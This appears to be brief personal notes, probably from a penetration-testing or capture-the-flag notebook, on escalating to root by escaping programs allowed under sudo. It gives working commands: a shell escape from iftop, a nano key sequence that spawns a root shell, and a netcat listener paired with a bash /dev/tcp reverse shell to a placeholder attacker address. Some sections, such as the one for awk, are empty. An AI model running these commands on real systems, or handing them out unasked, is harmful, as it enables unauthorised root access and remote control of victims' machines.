shell escaping

start to know which process run with sudo privilege sudo -l

image.png

we will exploit all service


Iftop

sudo /usr/sbin/iftop
!/bin/sh

awk


may command line not suitable when as a root by nano service so let’s try to take a reverse shell

nano

sudo nano
ctrl+R
ctrl+x
reset; sh 1>&0 2>&0

which open a root shell but it’s blind which u can see the result only so let’s take a reverse shell on our machine

# attacker machine
nc -nlvp 5253
# victim
bash -i >& /dev/tcp/AttackerIP/5253 0>&1

Last updated